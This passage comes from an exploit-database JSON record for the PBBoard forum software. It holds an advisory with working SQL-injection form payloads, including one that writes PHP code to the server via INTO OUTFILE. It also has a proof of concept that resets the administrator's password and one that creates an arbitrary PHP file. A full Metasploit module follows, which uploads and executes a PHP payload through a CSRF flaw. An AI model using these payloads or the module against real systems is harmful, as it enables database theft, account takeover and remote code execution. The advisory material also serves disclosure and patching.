method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"section\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.5 Input passed via the \"section_id\" POST parameter to /index.php (when \"startdeleteposts\" and \"do_replys\" parameters are set, and \"page\" is set to \"managementreply\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"section_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"hidden\" name=\"check[]\" value=\"1\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.6 Input passed via the \"member_id\" POST parameter to /index.php (when \"forget\" parameter is set, and \"page\" is set to \"new_password\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"member_id\" value=\"1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \">\r\n<input type=\"hidden\" name=\"new_password\" value=\"1\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n1.7 Input passed via the \"subjectid\" POST parameter to /index.php (when \"start\" parameter is set, and \"page\" is set to \"tags\") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=tags&start=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"subjectid\" value=\"' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- \">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that \"magic_quotes_gpc\" is set to \"off\". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. \r\n\r\n\r\n2) Improper Authentication in PBBoard: CVE-2012-4035\r\n\r\nPBBoard permits to change password of any board member due to absence of any verification of user-supplied \"member_id\" POST parameter in the password change script.\r\n\r\nThe following PoC changes password for the user with ID=1 (forum administrator):\r\n\r\n\r\n<form action=\"http://[host]/index.php?page=new_password&forget=1\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"member_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"new_password\" value=\"new_password\">\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\n\r\n3) Improper Access Control in PBBoard: CVE-2012-4036\r\n\r\nInput passed via the \"xml_name\" POST parameter to /admin.php (when \"export\" and \"export_writing\" parameters are set, and \"page\" parameter is set to \"addons\") is not properly sanitised before being used as a name of a newly created file.\r\n\r\nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration.\r\n\r\nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution:\r\n\r\n\r\n<form action=\"http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php\" method=\"post\" name=\"main\" id=\"main\">\r\n<input type=\"hidden\" name=\"context\" value='<? phpinfo(); ?>'>\r\n<input type=\"submit\" name=\"Submit\" value=\"Send\"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of this vulnerability requires administrative priveledges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nApply 5-8-2012 Security Patch\r\n\r\nMore Information:\r\nhttp://www.pbboard.com/forums/t10352.html\r\nhttp://www.pbboard.com/forums/t10353.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19165"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:29", "references": [], "edition": 1, "description": "", "reporter": "KedAns-Dz", "published": "2012-05-29T00:00:00", "type": "packetstorm", "title": "PBBoard 2.1.4 Cross Site Request Forgery", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1216"], "modified": "2012-05-29T00:00:00", "href": "https://packetstormsecurity.com/files/113109/PBBoard-2.1.4-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:113109", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Site : 1337day.com 0 \n1 [+] Support e-mail : submit[at]1337day.com 1 \n0 0 \n1 ######################################### 1 \n0 I'm KedAns-Dz member from Inj3ct0r Team 1 \n1 ######################################### 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n### \n# Title : PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution (MSF) \n# Author : KedAns-Dz \n# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) \n# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) \n# Web Site : www.1337day.com | www.inj3ct0rs.com \n# mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d \n# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com \n# platform : php \n# Type : Metasploit -Remote Exploit- \n# Security Risk : Critical \n# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 \n### \n \n## \n# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | \n# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | \n# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | \n# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | \n# | ------------------------------------------------- < | \n## \n \n# <3 <3 Greetings t0 Palestine <3 <3 \n \n# Download : [http://github.com/downloads/PhpMax/PBBoard/PBBoard_v2_1_4.zip] \n \n######## (!) References => \n# _______________ \n# | CVE-2012-1216 | \n# | OSVDB-79218 | \n# | 1337ID-17520 | \n# | PS-SEC-109706 | \n# | CWE-352 | \n# --------------- \n# \n######## (!) Exploit ====> \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution\", \n'Description' => %q{ \nThis module exploits a Multiple cross-site request forgery (CSRF) vulnerabilities \nin admin.php in PBBoard 2.1.4 allow remote attackers to hijack the authentication \nof administrators for requests that upload a file via an add action. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'KedAns-Dz <ked-h[at]1337day.com>', # Discovery PoC ,and Metasploit module \n], \n'References' => \n[ \n['CVE', '2012-1216'], \n['OSVDB', '79218'], \n['URL', 'http://1337day.com/exploits/17520'], # 1337ID-17520 \n['URL', 'http://secunia.com/advisories/47948/'], # SA47948 \n['URL', 'http://packetstormsecurity.org/files/109706/PBBoard-2.1.4-Cross-Site-Request-Forgery-Shell-Upload.html'] # PS-SEC-109706 \n# CWE-352 \n# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1216 \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['PBBoard v2.1.4', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Fev 12 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to dorncms', '/PBBoard v2.1.4']) \n], self.class) \nend \n \ndef check \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}admin.php\" \n}) \n \nif res and res.code == 200 and res.body.empty? \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(5) + 5) + '.php' \n \npost_data = \"--1337day\\r\\n\" \npost_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\" \npost_data << \"Content-Type : text/html;\\r\\n\" \npost_data << \"<?php \" \npost_data << payload.encoded \npost_data << \" ?>\\r\\n\" \npost_data << \"--1337day\\r\\n\" \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}admin.php?page=pages&add=1&start=1\", \n'ctype' => 'multipart/form-data; boundary=1337day', \n'data' => post_data \n}) \n \nif not res or res.code != 200 or res.body !~ /#{payload_name}/ \nprint_error(\"#{peer} - I don't think the file was uploaded !\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}#{payload_name}\" \n}) \n \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returns #{res.code.to_s}\") \nend \nend \n \n############# << ThE|End \n \n#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== \n# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w \n# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) \n# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection \n# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore \n# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke \n# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE \n# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs .. \n#===========================================================================================================`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113109/pbboard-mcsrf-fu-cexe.rb.txt"}]}}